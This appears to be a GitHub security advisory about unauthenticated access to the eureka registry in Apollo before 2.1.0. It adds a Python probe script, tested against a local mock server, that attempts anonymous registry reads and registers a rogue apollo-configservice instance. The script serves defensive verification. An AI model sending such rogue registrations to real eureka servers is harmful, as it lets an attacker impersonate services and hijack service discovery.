
Potential access control security issue in eureka

Low
nobodyiam published GHSA-368x-wmmg-hq5c Feb 18, 2023

Package

No package listed

Affected versions

<2.1.0

Patched versions

2.1.0

Description

Impact

If apollo-configservice is exposed to the internet (which is not recommended), the built-in eureka service it hosts has no authentication enabled, so anyone who can reach it can use the eureka registry directly. An attacker could register fake apollo-configservice and apollo-adminservice instances with eureka and thereby impersonate those services to anything that discovers them through the registry.

Patches

Login authentication for eureka was added in #4663 and released in v2.1.0.
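As an added example, not part of this advisory or of the Apollo project's code, the following Python script checks the two conditions described above: whether an anonymous client can read the eureka registry and whether it can register an instance under the apollo-configservice application name (the pre-2.1.0 situation), and whether a client presenting credentials is accepted (the patched behaviour). It uses the standard Eureka REST registry paths (`/eureka/apps` and `/eureka/apps/{appID}`); the in-process mock server, the `apollo`/`s3cret` credentials, the host names, the 192.0.2.10 address and the registration document are all constructed for the example.

```python
"""Probe a Eureka registry for anonymous reads and rogue registrations (added example)."""
import base64
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib import error, request

APP_ID = "APOLLO-CONFIGSERVICE"

# Constructed registration document in the shape Eureka's REST API accepts; a rogue
# registration like this is how an attacker would impersonate apollo-configservice.
ROGUE_INSTANCE = {"instance": {
    "instanceId": "attacker-host:apollo-configservice:8080", "hostName": "attacker-host",
    "app": APP_ID, "ipAddr": "192.0.2.10", "status": "UP",
    "port": {"$": 8080, "@enabled": "true"},
    "dataCenterInfo": {"@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
                       "name": "MyOwn"}}}


def basic_auth(creds):
    return "Basic " + base64.b64encode(f"{creds[0]}:{creds[1]}".encode()).decode()


def http_status(base_url, method, path, body=None, creds=None):
    """Issue one request and return its HTTP status instead of raising on 4xx/5xx."""
    headers, data = {"Accept": "application/json"}, None
    if body is not None:
        data, headers["Content-Type"] = json.dumps(body).encode(), "application/json"
    if creds is not None:
        headers["Authorization"] = basic_auth(creds)
    req = request.Request(base_url + path, data=data, method=method, headers=headers)
    try:
        with request.urlopen(req, timeout=5) as resp:
            return resp.status
    except error.HTTPError as exc:
        return exc.code


def _ok(status):
    return 200 <= status < 300


def probe_eureka(base_url, creds=None):
    """Report what an anonymous client can do and, if creds are given, whether they work."""
    result = {
        "anonymous_read": _ok(http_status(base_url, "GET", "/eureka/apps")),
        "anonymous_register": _ok(http_status(base_url, "POST", f"/eureka/apps/{APP_ID}",
                                              body=ROGUE_INSTANCE)),
    }
    if creds is not None:
        result["authenticated_read"] = _ok(http_status(base_url, "GET", "/eureka/apps", creds=creds))
    return result


def start_mock_eureka(require_auth, creds=("apollo", "s3cret")):
    """In-process stand-in for a Eureka server (constructed for this example)."""
    expected = basic_auth(creds)

    class Handler(BaseHTTPRequestHandler):
        def _authorized(self):
            if not require_auth or self.headers.get("Authorization") == expected:
                return True
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="eureka"')
            self.send_header("Content-Length", "0")
            self.end_headers()
            return False

        def do_GET(self):
            if not self._authorized():
                return
            body = json.dumps({"applications": {"application": []}}).encode()
            self.send_response(200 if self.path == "/eureka/apps" else 404)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def do_POST(self):
            self.rfile.read(int(self.headers.get("Content-Length", 0)))  # consume instance doc
            if not self._authorized():
                return
            # A real Eureka answers 204 No Content to a successful registration.
            self.send_response(204 if self.path.startswith("/eureka/apps/") else 404)
            self.end_headers()

        def log_message(self, *args):
            pass  # keep the example quiet

    server = HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_port}", server


def self_check():
    """Compare an unauthenticated mock (pre-2.1.0 behaviour) with an authenticated one."""
    results = {}
    for label, require_auth in (("open", False), ("authenticated", True)):
        base_url, server = start_mock_eureka(require_auth)
        try:
            results[label] = probe_eureka(base_url, creds=("apollo", "s3cret"))
        finally:
            server.shutdown()
            server.server_close()
    return results


if __name__ == "__main__":
    for label, report in self_check().items():
        print(label, report)
```

Against the open mock every field is True; against the authenticated mock both anonymous fields are False and only the credentialed read succeeds, which is the result to expect from a correctly configured 2.1.0 deployment. Point `probe_eureka` at a real base URL only for a server you operate: a 2xx on the POST means a real instance was registered, and it should be removed with a DELETE to `/eureka/apps/{appID}/{instanceId}` afterwards.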

Workarounds

To mitigate the issue without upgrading, follow the existing advice and do not expose apollo-configservice to the internet.

References

Apollo Security Guidance

For more information

If you have any questions or comments about this advisory:

Severity

Low

CVE ID

CVE-2023-25570

Weaknesses

No CWEs